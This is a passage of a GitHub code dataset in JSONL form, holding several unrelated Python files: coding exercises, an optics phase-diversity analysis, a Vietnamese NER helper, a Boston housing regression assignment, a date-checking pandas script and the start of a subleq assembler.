config=config_)\napp()\nst.write(mall)\n","repo_name":"otosense/plunk","sub_path":"plunk/sb/front_experiments/edge_interface/sound_tagger.py","file_name":"sound_tagger.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"8360088824","text":"'''\nGiven a string if all the chars are unique \n\treturn True\nelse \n\treturn False\n'''\n\n# Time complexity is O(n)\n\ndef IsAllCharsUnique(string):\n\tstring_dict = {}\n\n\tfor i in string:\n\t\tif i in string_dict: return False\n\t\telse: string_dict[i] = 1 \n\n\treturn True\n\nprint(IsAllCharsUnique(\"aebcde\"))","repo_name":"Manoji97/Data-Structures-Algorithms-Complete","sub_path":"InterviewQuestions/Python/1_Arrays/7_UniqueCharsInString.py","file_name":"7_UniqueCharsInString.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"29466616996","text":"import phaseDiversity3PSFs as PD\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport fs\nimport os\nimport pyfits\n#import seaborn as sns\n#sns.set()\n\npupilRadius = 1.6e-3\nlbda = 0.6375e-6\nF = 80e-3\npxsize = 5.3e-6\nN = 400\ndxp = lbda*F/(N*pxsize)\ndeltaZ = 3.19e-3\njmin = 4\njmax = 30\n\n#retrieve ajsIDL and ajsTrue\n\najsTrueFolderPath = 'C:\\\\Users\\\\Jojo\\\\Desktop\\\\PdM-HEIG\\\\Science\\\\data\\\\devPD\\\\PSFforIDLtreatment\\\\ajsTrue'\najsTrueFile = os.listdir(ajsTrueFolderPath)\najsIDLFolderPath = 'C:\\\\Users\\\\Jojo\\\\Desktop\\\\PdM-HEIG\\\\Science\\\\data\\\\devPD\\\\PSFforIDLtreatment\\\\IDLajs'\najsIDLFile = os.listdir(ajsIDLFolderPath)\n\njsTrue = np.zeros([len(ajsIDLFile),jmax-jmin+1])\najsTrue = np.zeros([len(ajsIDLFile),jmax-jmin+1])\nrmsWFeTrue = np.zeros(len(ajsIDLFile))\n\njsIDL = np.zeros([len(ajsIDLFile),jmax-jmin+1])\najsIDLmodal = np.zeros([len(ajsIDLFile),jmax-jmin+1])\nrmsWFeIDLmodalretrieved = np.zeros(len(ajsIDLFile))\nrmsemodal = np.zeros(len(ajsIDLFile))\n\najsIDLzonal = np.zeros([len(ajsIDLFile),jmax-jmin+1])\nrmsWFeIDLzonalretrieved = np.zeros(len(ajsIDLFile))\nrmsezonal = np.zeros(len(ajsIDLFile))\n\nrmsWFeIDLtrue = np.zeros(len(ajsIDLFile))\n\nfor i in np.arange(len(ajsIDLFile)):\n rmsWFeTrue[i] = (((ajsTrueFile[i]).replace('.','_')).split('_'))[-2]\n rmsWFeIDLtrue[i] = (((ajsIDLFile[i]).replace('.','_')).split('_'))[-2]\n \n jsajsTrue = np.loadtxt(ajsTrueFolderPath+'\\\\'+ajsTrueFile[i])\n jsTrue[i,:] = jsajsTrue[0,:]\n ajsTrue[i,:] = jsajsTrue[1,:]*1e9*lbda/2/np.pi\n \n jsajsIDL = np.loadtxt(ajsIDLFolderPath+'\\\\'+ajsIDLFile[i],delimiter=',',skiprows=1)\n jsIDL[i,:] = jsajsIDL[:,0]\n ajsIDLmodal[i,:] = jsajsIDL[:,1]*1000\n ajsIDLzonal[i,:] = jsajsIDL[:,2]*1000\n \n rmsWFeIDLmodalretrieved[i] = fs.RMSwavefrontError(jsIDL[i,:],ajsIDLmodal[i,:])\n rmsemodal[i] = fs.RMSE(ajsIDLmodal[i,:],ajsTrue[i,:])\n rmsWFeIDLzonalretrieved[i] = fs.RMSwavefrontError(jsIDL[i,:],ajsIDLzonal[i,:])\n rmsezonal[i] = fs.RMSE(ajsIDLzonal[i,:],ajsTrue[i,:])\n\n\nrmsWFefolderPath = 'C:\\\\Users\\\\Jojo\\\\Desktop\\\\PdM-HEIG\\\\Science\\\\data\\\\devPD\\\\PSFforIDLtreatment\\\\PSFs'\nrmsWFerrorFolderPaths = os.listdir(rmsWFefolderPath)\n\nNrmsWFe = len(rmsWFerrorFolderPaths)\nrmsePy = np.zeros(NrmsWFe)\nrmsWFerrorsPyRetrieved = np.zeros(NrmsWFe)\nrmsWFeTruePy = np.zeros(NrmsWFe)\njsretrieved = np.zeros([NrmsWFe,jmax-jmin+1])\najsretrieved = np.zeros([NrmsWFe,jmax-jmin+1])\n\nfor irms,rmsWFdir in enumerate(rmsWFerrorFolderPaths):\n PSFfolderPaths = rmsWFefolderPath+'\\\\' + rmsWFdir\n sPSFfiles = os.listdir(PSFfolderPaths)\n rmsWFeTruePy[irms] = (rmsWFdir.split('_'))[-1]\n \n PSFs = np.zeros([3,400,400])\n deltaZs = np.array([])\n for ipsf,sPSFfile in enumerate(sPSFfiles):\n PSFfilePath = rmsWFefolderPath+ '\\\\' + rmsWFdir + '\\\\' + sPSFfile\n hdulist = pyfits.open(PSFfilePath)\n PSFs[ipsf,:,:] = hdulist[0].data\n deltaZs = np.append(deltaZs,int(((sPSFfile.replace('.','_')).split('_'))[-2]))\n \n IxdeltaZ =np.argsort(deltaZs)\n \n phaseDiv = PD.phaseDiversity3PSFs(PSFs[IxdeltaZ[1],:,:],PSFs[IxdeltaZ[2],:,:],PSFs[IxdeltaZ[0],:,:],deltaZ,lbda,pxsize,F,pupilRadius,jmin,jmax)\n \n jsretrieved[irms,:] = phaseDiv.result['js']\n ajsretrieved[irms,:] = phaseDiv.result['ajs']*1e9*lbda/2/np.pi\n \n a = np.where(rmsWFeTrue==rmsWFeTruePy[irms])\n \n rmsePy[irms] = fs.RMSE(ajsretrieved[irms,:],ajsTrue[a,:])\n rmsWFerrorsPyRetrieved[irms] = fs.RMSwavefrontError(jsretrieved[irms,:],ajsretrieved[irms,:])\n\n\n\nrmsWFerrorMax = np.max(np.append(rmsWFerrorsPyRetrieved,rmsWFeTrue))\nrmsWFerrorMin = np.min(np.append(rmsWFerrorsPyRetrieved,rmsWFeTrue))\n\nfnamerms = '../../../fig/PDDev/compDiversity/rmsWFerrorsretrieved_rmsWFeWthIDL%s'\nfnamermse = '../../../fig/PDDev/compDiversity/rmse_rmsWFeWthIDL%s'\nIxsortIDl = np.argsort(rmsWFeIDLtrue)\nIxsortPy = np.argsort(rmsWFeTruePy)\nfig = plt.figure()\nplt.hold(True)\nplt.plot(rmsWFeTruePy[IxsortPy],rmsWFerrorsPyRetrieved[IxsortPy],label='Analytical Algo')\nplt.plot(rmsWFeIDLtrue[IxsortIDl],rmsWFeIDLmodalretrieved[IxsortIDl],label='ONERA modal')\nplt.plot(rmsWFeIDLtrue[IxsortIDl],rmsWFeIDLzonalretrieved[IxsortIDl],label='ONERA zonal')\nplt.plot([rmsWFerrorMin,rmsWFerrorMax],[rmsWFerrorMin,rmsWFerrorMax],linewidth=2,c='grey')\nplt.xlim([rmsWFerrorMin,rmsWFerrorMax])\nplt.ylim([rmsWFerrorMin,rmsWFerrorMax])\nplt.xlabel('$\\sigma_{WF,rms}$ true [nm]')\nplt.ylabel('$\\sigma_{WF,rms}$ retrieved [nm]')\nplt.legend(loc='best')\nplt.grid()\nplt.savefig(fnamerms % ('.png'), dpi=300)\nplt.savefig(fnamerms % ('.pdf'), dpi=300)\n#plt.close(fig)\n\nfig = plt.figure()\nplt.plot(rmsWFeTruePy[IxsortPy],rmsePy[IxsortPy],label='Analytical Algo')\nplt.plot(rmsWFeIDLtrue[IxsortIDl],rmsemodal[IxsortIDl],label='ONERA modal')\nplt.plot(rmsWFeIDLtrue[IxsortIDl],rmsezonal[IxsortIDl],label='ONERA zonal')\nplt.xlim([rmsWFerrorMin,rmsWFerrorMax])\nplt.xlabel('$\\sigma_{WF,rms}$ true [nm]')\nplt.ylabel('RMSE [nm]')\nplt.legend(loc='best')\nplt.grid()\nplt.savefig(fnamermse % ('.png'), dpi=300)\nplt.savefig(fnamermse % ('.pdf'), dpi=300)\n#plt.close(fig)\n\n\nfor irms,rmsWFe in enumerate(rmsWFeTrue):\n filename = '../../../fig/PDDev/compDiversity/js_ajs_Python_IDL_rmsWfe_%d%s'\n a = np.where(rmsWFeTruePy==rmsWFe)\n plt.figure() \n plt.title('$\\sigma_{WF,rms}$ = %4.1f' % (rmsWFe))\n plt.hold(True)\n plt.plot(jsTrue[irms,:],ajsTrue[irms,:],linewidth = 3,label='True')\n plt.plot(jsretrieved[irms,:],ajsretrieved[irms,:],linewidth=2,label='Python retrieved')\n plt.plot(jsIDL[irms,:],ajsIDLmodal[irms,:],linewidth=2,label='IDL modal retrieved')\n plt.plot(jsIDL[irms,:],ajsIDLzonal[irms,:],linewidth=2,label='IDL zonal retrieved')\n plt.xlabel('j')\n plt.ylabel('aj [nm]')\n plt.xlim([jsTrue[irms,0],jsTrue[irms,-1]])\n plt.legend(loc='best')\n plt.grid()\n plt.savefig(filename % (rmsWFe,'.png'), dpi=300)\n plt.savefig(filename % (rmsWFe,'.pdf'), dpi=300)","repo_name":"jordanvoirin/PdM","sub_path":"Python/phaseDiversity/comparisonWthDiversity.py","file_name":"comparisonWthDiversity.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"7734609883","text":"import argparse\nimport sys\n\n# import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport torch\n# import transformersm\nfrom fairseq.data import Dictionary\nfrom fairseq.data.encoders.fastbpe import fastBPE\n# from keras.preprocessing.sequence import pad_sequences\nfrom keras_preprocessing.sequence import pad_sequences\nfrom sklearn.metrics import f1_score\nfrom sklearn.model_selection import train_test_split\nfrom torch import nn\nfrom torch.nn import CrossEntropyLoss\nfrom torch.utils.data import (DataLoader, RandomSampler, SequentialSampler,\n TensorDataset)\nfrom tqdm.notebook import trange\nfrom transformers import *\nfrom transformers import (AdamW, RobertaConfig, RobertaForTokenClassification,\n get_linear_schedule_with_warmup)\n\n\nclass Ner(BertPreTrainedModel):\n config_class = RobertaConfig\n pretrained_model_archive_map = ROBERTA_PRETRAINED_MODEL_ARCHIVE_MAP\n base_model_prefix = \"roberta\"\n\n def __init__(self, config):\n super().__init__(config)\n self.num_labels = config.num_labels\n self.roberta = RobertaModel(config)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n self.classifier = nn.Linear(\n config.hidden_size*4, config.num_labels)\n self.init_weights()\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n token_type_ids=None,\n position_ids=None,\n head_mask=None,\n inputs_embeds=None,\n labels=None,\n ):\n\n outputs = self.roberta(\n input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n )\n\n output = torch.cat(\n (outputs[2][-1], outputs[2][-2], outputs[2][-3], outputs[2][-4]), dim=-1)\n sequence_output = self.dropout(output)\n logits = self.classifier(sequence_output)\n outputs = logits\n\n if labels is not None:\n loss_fct = CrossEntropyLoss()\n active_loss = attention_mask.view(-1) == 1\n active_logits = logits.view(-1, self.num_labels)\n active_labels = torch.where(\n active_loss, labels.view(-1), torch.tensor(\n loss_fct.ignore_index).type_as(labels)\n )\n loss = loss_fct(active_logits, active_labels)\n outputs = (loss, logits)\n return outputs\n\n\nmodel2 = torch.load(\"model/best_ner_syllable.pt\", map_location='cpu')\n\ndf_test = []\ni = 1\nfor line in open(\"data/test_word.conll\", \"r\").readlines():\n if len(line.split()) < 2:\n i += 1\n else:\n tmp = line.split()\n tmp.append('s'+str(i))\n df_test.append(tmp)\n\ndata_test = pd.DataFrame(df_test, columns=['Word', 'Tag', 'Sentence#'])\n\n\ndef concatWord(data):\n def tuple_func(f): return [(w, t)\n for w, t in zip(f['Word'].values, f['Tag'].values)]\n sentences_with_tag = data.groupby('Sentence#').apply(tuple_func)\n # print(sentences_with_tag)\n sentences_with_tag = [sent for sent in sentences_with_tag]\n return sentences_with_tag\n\n\nsentences_with_tag_test = concatWord(data_test)\n\nsentences_test = [' '.join([word[0] for word in sent])\n for sent in sentences_with_tag_test]\nlabels_test = [[word[1] for word in sent] for sent in sentences_with_tag_test]\n\n\ndf_train = []\ni = 1\nfor line in open(\"data/train_syllable.conll\", \"r\").readlines():\n if len(line.split()) < 2:\n i += 1\n else:\n tmp = line.split()\n tmp.append('s'+str(i))\n df_train.append(tmp)\ndata_train = pd.DataFrame(df_train, columns=['Word', 'Tag', 'Sentence#'])\nlabel2idx = {k: v for v, k in enumerate(data_train.Tag.unique())}\nids_to_labels = {v: k for v, k in enumerate(data_train.Tag.unique())}\nlabel2idx['PAD'] = 20\nlabel2idx['[CLS]'] = 21\nlabel2idx['[SEP]'] = 22\nlabel2idx['X'] = 23\nids_to_labels[20] = 'PAD'\nids_to_labels[21] = '[CLS]'\nids_to_labels[22] = '[SEP]'\nids_to_labels[23] = 'X'\n\nlabels_value = ['PAD', '[CLS]', '[SEP]', 'X']+data_train.Tag.unique().tolist()\nparser = argparse.ArgumentParser()\nparser.add_argument('--bpe-codes',\n default=\"phobert-base/bpe.codes\",\n required=False,\n type=str,\n help='path to fastBPE BPE'\n )\nargs, unknown = parser.parse_known_args()\n\nbpe = fastBPE(args)\nvocab = Dictionary()\nvocab.add_from_file(\"phobert-base/vocab.txt\")\n\n\ndef text2output(text, vocab):\n sentences_test\n subwords_test = [' '+bpe.encode(text)+' ']\n input_ids_test = pad_sequences([vocab.encode_line(sent, append_eos=False, add_if_not_exist=False).long().tolist() for sent in subwords_test],\n truncating='post', padding='post', maxlen=90, value=1.0, dtype='long')\n attenion_mask_test = [[float(val != 1) for val in sent]\n for sent in input_ids_test]\n\n X_test = input_ids_test\n test_mask = attenion_mask_test\n\n X_test = torch.tensor(X_test)\n test_mask = torch.tensor(test_mask)\n pred_labels_ids = []\n with torch.no_grad():\n output_test = model2(X_test[0:1], test_mask[0:1])\n\n logit = output_test.detach().cpu().numpy()\n pred_labels_ids.extend([list(pred_label)\n for pred_label in np.argmax(logit, axis=2)])\n pred = [ids_to_labels[pred_labels_ids[j][i]] for j in range(\n len(pred_labels_ids)) for i in range(len(pred_labels_ids[j]))]\n return list(zip(subwords_test[0].split(), pred))\n # return subwords_test[0].split(), pred\n\nbang_nguyen_am = [['a', 'à', 'á', 'ả', 'ã', 'ạ', 'a'],\n ['ă', 'ằ', 'ắ', 'ẳ', 'ẵ', 'ặ', 'aw'],\n ['â', 'ầ', 'ấ', 'ẩ', 'ẫ', 'ậ', 'aa'],\n ['e', 'è', 'é', 'ẻ', 'ẽ', 'ẹ', 'e'],\n ['ê', 'ề', 'ế', 'ể', 'ễ', 'ệ', 'ee'],\n ['i', 'ì', 'í', 'ỉ', 'ĩ', 'ị', 'i'],\n ['o', 'ò', 'ó', 'ỏ', 'õ', 'ọ', 'o'],\n ['ô', 'ồ', 'ố', 'ổ', 'ỗ', 'ộ', 'oo'],\n ['ơ', 'ờ', 'ớ', 'ở', 'ỡ', 'ợ', 'ow'],\n ['u', 'ù', 'ú', 'ủ', 'ũ', 'ụ', 'u'],\n ['ư', 'ừ', 'ứ', 'ử', 'ữ', 'ự', 'uw'],\n ['y', 'ỳ', 'ý', 'ỷ', 'ỹ', 'ỵ', 'y']]\nbang_ky_tu_dau = ['', 'f', 's', 'r', 'x', 'j']\n\nnguyen_am_to_ids = {}\n\nfor i in range(len(bang_nguyen_am)):\n for j in range(len(bang_nguyen_am[i]) - 1):\n nguyen_am_to_ids[bang_nguyen_am[i][j]] = (i, j)\n\n\ndef chuan_hoa_dau_tu_tieng_viet(word):\n if not is_valid_vietnam_word(word):\n return word\n\n chars = list(word)\n dau_cau = 0\n nguyen_am_index = []\n qu_or_gi = False\n for index, char in enumerate(chars):\n x, y = nguyen_am_to_ids.get(char, (-1, -1))\n if x == -1:\n continue\n elif x == 9: # check qu\n if index != 0 and chars[index - 1] == 'q':\n chars[index] = 'u'\n qu_or_gi = True\n elif x == 5: # check gi\n if index != 0 and chars[index - 1] == 'g':\n chars[index] = 'i'\n qu_or_gi = True\n if y != 0:\n dau_cau = y\n chars[index] = bang_nguyen_am[x][0]\n if not qu_or_gi or index != 1:\n nguyen_am_index.append(index)\n if len(nguyen_am_index) < 2:\n if qu_or_gi:\n if len(chars) == 2:\n x, y = nguyen_am_to_ids.get(chars[1])\n chars[1] = bang_nguyen_am[x][dau_cau]\n else:\n x, y = nguyen_am_to_ids.get(chars[2], (-1, -1))\n if x != -1:\n chars[2] = bang_nguyen_am[x][dau_cau]\n else:\n chars[1] = bang_nguyen_am[5][dau_cau] if chars[1] == 'i' else bang_nguyen_am[9][dau_cau]\n return ''.join(chars)\n return word\n\n for index in nguyen_am_index:\n x, y = nguyen_am_to_ids[chars[index]]\n if x == 4 or x == 8: # ê, ơ\n chars[index] = bang_nguyen_am[x][dau_cau]\n # for index2 in nguyen_am_index:\n # if index2 != index:\n # x, y = nguyen_am_to_ids[chars[index]]\n # chars[index2] = bang_nguyen_am[x][0]\n return ''.join(chars)\n\n if len(nguyen_am_index) == 2:\n if nguyen_am_index[-1] == len(chars) - 1:\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[0]]]\n chars[nguyen_am_index[0]] = bang_nguyen_am[x][dau_cau]\n # x, y = nguyen_am_to_ids[chars[nguyen_am_index[1]]]\n # chars[nguyen_am_index[1]] = bang_nguyen_am[x][0]\n else:\n # x, y = nguyen_am_to_ids[chars[nguyen_am_index[0]]]\n # chars[nguyen_am_index[0]] = bang_nguyen_am[x][0]\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[1]]]\n chars[nguyen_am_index[1]] = bang_nguyen_am[x][dau_cau]\n else:\n # x, y = nguyen_am_to_ids[chars[nguyen_am_index[0]]]\n # chars[nguyen_am_index[0]] = bang_nguyen_am[x][0]\n x, y = nguyen_am_to_ids[chars[nguyen_am_index[1]]]\n chars[nguyen_am_index[1]] = bang_nguyen_am[x][dau_cau]\n # x, y = nguyen_am_to_ids[chars[nguyen_am_index[2]]]\n # chars[nguyen_am_index[2]] = bang_nguyen_am[x][0]\n return ''.join(chars)\n\n\ndef is_valid_vietnam_word(word):\n chars = list(word)\n nguyen_am_index = -1\n for index, char in enumerate(chars):\n x, y = nguyen_am_to_ids.get(char, (-1, -1))\n if x != -1:\n if nguyen_am_index == -1:\n nguyen_am_index = index\n else:\n if index - nguyen_am_index != 1:\n return False\n nguyen_am_index = index\n return True\n\n\ndef chuan_hoa_dau_cau_tieng_viet(sentence):\n \"\"\"\n Chuyển câu tiếng việt về chuẩn gõ dấu kiểu cũ.\n :param sentence:\n :return:\n \"\"\"\n sentence = sentence.lower()\n words = sentence.split()\n for index, word in enumerate(words):\n cw = re.sub(r'(^\\p{P}*)([p{L}.]*\\p{L}+)(\\p{P}*$)',\n r'\\1/\\2/\\3', word).split('/')\n # print(cw)\n if len(cw) == 3:\n cw[1] = chuan_hoa_dau_tu_tieng_viet(cw[1])\n words[index] = ''.join(cw)\n return ' '.join(words)\n\n\ndef chuan_hoa_chuam_cau(text):\n tmp = []\n for t in text.split():\n if t[-1] in ',.:!?;*#$%^*()!~':\n t = t[:-1]+' '+t[-1]\n tmp.append(t)\n return ' '.join(tmp)\n\nimport unicodedata\ntext = chuan_hoa_dau_tu_tieng_viet(sys.argv[1])\ntext = chuan_hoa_chuam_cau(text)\ntext = unicodedata.normalize('NFC', text)\nfinal_result = text2output(text, vocab)\n# print(sys.argv[1])\n# print(text)\n# print(final_result)\nf = open(\"data/first_text.txt\", \"w\")\nf.write(sys.argv[1])\nf = open(\"data/final_result.txt\", \"w\")\nf.write(' '.join([str(item) for item in final_result]))\nf.close()\n\n","repo_name":"AndrewBui-AI-CS/NLP_CovidNer","sub_path":"api/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":11022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"26376759162","text":"\"\"\"\r\n\"Assignment 4 - SK Learn Introduction\" - Part 1\r\nBoston Dataset\r\n\"\"\"\r\n\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.datasets import load_boston\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef plot_graph(boston_get_data, feature_name, target_name):\r\n\r\n boston_plot_data_df = pd.DataFrame(\r\n boston_get_data.data, columns=boston_get_data.feature_names\r\n )\r\n boston_plot_data_df[target_name] = boston_get_data.target\r\n sns.pairplot(\r\n boston_plot_data_df,\r\n x_vars=[feature_name],\r\n y_vars=target_name,\r\n height=7,\r\n aspect=0.7,\r\n kind=\"reg\",\r\n )\r\n plt.title(\"Slope of the factor with the largest effect\")\r\n plt.show()\r\n\r\n\r\ndef make_regression_boston_data_and_plot():\r\n\r\n boston_get_data = load_boston()\r\n x_boston_dataframe = pd.DataFrame(\r\n boston_get_data.data, columns=boston_get_data.feature_names\r\n )\r\n y_boston_dataframe = pd.DataFrame(boston_get_data.target, columns=[\"MEDV\"])\r\n linear_regr = LinearRegression()\r\n linear_regr.fit(x_boston_dataframe, y_boston_dataframe)\r\n coeff_df = pd.DataFrame(\r\n linear_regr.coef_.T, x_boston_dataframe.columns, columns=[\"Coefficient\"]\r\n )\r\n print(coeff_df)\r\n max_coeff_index = coeff_df.abs()[\"Coefficient\"].idxmax()\r\n max_abs_coeff_value = coeff_df.abs().loc[max_coeff_index, \"Coefficient\"]\r\n print(\r\n \"The factor which has the largest effect on the price of housing in Boston is:\"\r\n + max_coeff_index\r\n )\r\n print(\r\n \"The absolute value of the coefficient of the factor which has the largest effect is: {}\".format(\r\n max_abs_coeff_value\r\n )\r\n )\r\n plot_graph(boston_get_data, max_coeff_index, \"MEDV\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n make_regression_boston_data_and_plot()\r\n\r\n\r\n\"\"\"\r\n\r\nComment\r\n\r\nIn order to solve the first part of \"Assignment 4 - SK Learn\r\nIntroduction\" (the part regarding the Boston dataset) first I\r\nimport \"LinearRegression\" from \"sklearn.linear_model\", \"load_boston\"\r\nfrom \"sklearn.datasets\", \"pandas\" as \"pd\", \"seaborn\" as \"sns\" and\r\n\"matplotlib.pyplot\" as \"plt\".\r\nThen I define the first function, named \"plot_graph\", and I include\r\nin the brackets \"boston_get_data\", \"feature_name\" and \"target_name\".\r\nMoreover, I set \"boston_plot_data_df\" equal to \"pd.DataFrame()\" and I\r\nalso include in the brackets \"boston_get_data.data\" and I set\r\n\"columns\" equal to \"boston_get_data.feature_names\". In addition to\r\nthis, I also set \"boston_plot_data_df[target_name]\" equal to\r\n\"boston_get_data.target\".\r\nFurthermore, I also include \"sns.pairplot\" and inside the brackets\r\nI include \"boston_plot_data_df\", \"x_vars=[feature_name]\",\r\n\"y_vars=target_name\" and I also set \"height\" equal to \"7\", \"aspect\"\r\nequal to \"0.7\" and \"kind\" equal to \"reg\".\r\nMoreover, I also include \"plt.title()\" and inside the brackets I also\r\ninclude the title of the plot, which is \"Slope of the factor with the\r\nlargest effect\". Lastly, I also include \"plt.show()\".\r\nFurthermore, I also define \"make_regression_boston_data_and_plot()\". To\r\nthis regard, first I set \"boston_get_data\" equal to \"load_boston()\" in\r\norder to take into consideration the data of the Boston dataset. Moreover,\r\nI set \"x_boston_dataframe\" equal to \"pd.DataFrame()\" and inside the\r\nbrackets I include \"boston_get_data.data\" and I also set \"columns\" equal\r\nto \"boston_get_data.feature_names\". In addition to this, I also set\r\n\"y_boston_dataframe\" equal to \"pd.DataFrame()\" and inside the brackets I\r\ninclude \"boston_get_data.target\" and I also set \"columns\" equal to\r\n\"[\"MEDV\"]\". I then set \"linear_regr\" equal to \"LinearRegression()\" and I\r\nalso include \"linear_regr.fit()\" and inside the brackets I include\r\n\"x_boston_dataframe\" and \"y_boston_dataframe\".\r\nMoreover, I set \"coeff_df\" equal to \"pd.DataFrame()\" and inside the brackets\r\nI include \"linear_regr.coef_.T\", \"x_boston_dataframe.columns\" and I also\r\nset \"columns\" equal to \"[\"Coefficient\"]\". I then use \"print()\" to print\r\nthe coefficients.\r\nFurthermore, I set \"max_coeff_index\" equal to\r\n\"coeff_df.abs()[\"Coefficient\"].idxmax()\" and also \"max_abs_coeff_value\"\r\nequal to \"coeff_df.abs().loc[max_coeff_index, \"Coefficient\"]\".\r\nMoreover, I use \"print()\" to print the factor which has the largest effect\r\non the price of housing in Boston and then also to print the absolute\r\nvalue of the coefficient of the factor which has the largest effect on the\r\nprice of housing in Boston. I then also include \"plot_graph()\" and inside\r\nthe brackets I include \"boston_get_data\", \"max_coeff_index\" and \"\"MEDV\"\".\r\nFinally, I also include \"if __name__ == \"__main__\":\" and\r\n\"make_regression_boston_data_and_plot()\".\r\nLastly, I type \"black\" in the \"Terminal\" followed by the path of the file\r\nin \".py format\" in order to format the whole code contained in the file\r\ntaken into consideration (basically the code of the file you are reading\r\nand so the code of the file in \".py format\" named\r\n\"Assignment.4.SK.Learn.Introduction.Part.1\").\r\n\r\n\r\nFrom the results obtained by running this code it is possible to state\r\nthat the factor that has the largest effect on the price of housing in\r\nBoston is \"NOX\" and also that the absolute value of its coefficient is\r\n17.766611228299986.\r\n\r\n\"\"\"\r\n","repo_name":"federico-mecchia/Assignment.4.SK.Learn.Introduction","sub_path":"Assignment.4.SK.Learn.Introduction.Part.1.py","file_name":"Assignment.4.SK.Learn.Introduction.Part.1.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"17381423377","text":"def sol(arr):\r\n #negative no store karo\r\n neg=0\r\n largneg=-99999999999999\r\n flag=0\r\n for i in arr:\r\n if i <0:\r\n largneg=max(largneg,i)\r\n neg+=1\r\n if i==0:\r\n flag=1\r\n # print(largneg)\r\n if (neg)==0:\r\n return min(arr)\r\n\r\n if (neg)%2==0 and largneg!=-99999999999999:\r\n arr.remove(largneg)\r\n res=1\r\n for i in arr:\r\n if i ==0:\r\n continue\r\n res*=i\r\n return res\r\n\r\nif __name__ == '__main__':\r\n arr=[ 2,5,-1,-2,-3,-4]\r\n # arr=[1,2,3,4,5,6,0]\r\n print(sol(arr))\r\n","repo_name":"Samundar9525/data_structure_using_Python","sub_path":"greedy/minimum product subaray.py","file_name":"minimum product subaray.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"17934463164","text":"import pandas as pd\r\nfrom datetime import datetime\r\n\r\ndf = pd.read_csv('python hands-on - dataset.csv')\r\nprint(df)\r\n\r\ndef isObsolete(benchmark_date,date):\r\n #date format must be 'yyyy-mm-dd'\r\n try:\r\n bm_date = datetime.strptime(benchmark_date,'%Y-%m-%d')\r\n date_to_check = datetime.strptime(date,'%Y-%m-%d')\r\n if date_to_check < bm_date:\r\n return 'TRUE'\r\n else:\r\n return 'FALSE'\r\n except TypeError as TE:\r\n print('Date must be a string in the format \"yyyy-mm-dd\"')\r\n except Exception as e:\r\n print('Some Other Error Occured: '+str(e)) \r\n\r\n \r\nbenchmark_date = '2021-01-01'\r\n\r\ndf['obsolete'] = df['date'].apply(lambda x: isObsolete(benchmark_date,x))\r\nprint(df)\r\n\r\nexportname = 'python hands-on - dataset.json'\r\ntry:\r\n df.to_json(exportname,orient='columns')\r\n print('File saved to current directory as '+ exportname)\r\nexcept Exception as e:\r\n print('Error saving json file: '+str(e))","repo_name":"jo5hxxvii/Data2BotsPythonHandsOnTest","sub_path":"Data2Bots Python Hands on Test.py","file_name":"Data2Bots Python Hands on Test.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"70492683422","text":"from functools import reduce\nfrom .util import *\n\nclass Subleq:\n NEXT = object()\n AGAIN = object()\n\n @staticmethod\n def to_string(a):\n if a == Subleq.NEXT:\n return \"NEXT\"\n elif a == Subleq.AGAIN:\n return \"AGAIN\"\n elif a == None:\n return \"NONE\"\n else:\n return a\n\nclass Program:\n def __init__(self):\n self.memory = []\n self.labels = dict()\n self.idx = None\n\n def index(self):\n return self.idx or len(self.memory)\n\n def seek(self, index):\n self.idx = index\n\n def set(self, data, line):\n if self.idx == len(self.memory):\n self.idx = None\n\n if self.idx != None:\n if self.idx < len(self.memory):\n if self.memory[self.idx] == None:\n self.memory[self.idx] = data\n self.idx += 1\n else:\n Error(\"trying to overwrite already written address 0x{:04x} in line {}\".format(self.idx, self.line))\n elif data != None:\n while self.idx >= len(self.memory):\n self.memory.append(None)\n self.memory[self.idx] = data\n self.idx += 1\n\n else:\n self.memory.append(data)\n\nclass Token:\n def is_seek(self, token):\n return token[0] == \"@\"\n\n def is_label(self, token):\n return token[-1] == \":\"\n\n def is_number(self, token):\n return token[0] in \"-0123456789\" or token == \"NONE\"\n\n def is_symbol(self, token):\n return not (self.is_seek(token) or self.is_label(token) or self.is_number(token))\n\nclass Assembler:\n def __init__(self, token = None, program = None, **kwargs):\n if program == None:\n program = Program()\n if token == None:\n token = Token()\n\n self.program = program\n self.token = token\n\n def next_token(self):\n return self.tokens.pop(0)\n\n def parse_seek(self, line, token):\n token = token[1:]\n try:\n token = parse_int(token)\n except:\n Error(\"could not parse {} as integer in line {}\".format(token, line))\n self.program.seek(token)\n\n def parse_label(self, line, token):\n token = token[:-1]\n if not self.token.is_symbol(token) or token == \"NEXT\" or token == \"AGAIN\":\n Error(\"definition of reserved label {} in line {}\".format(token, line))\n if token in self.program.labels:\n Error(\"redefinition of label {} in line {}\".format(token, line))\n self.program.labels[token] = self.program.index()\n\n def parse_number(self, line, token):\n if token == \"NONE\":\n token = None\n else:\n try:\n token = parse_int(token)\n except:\n 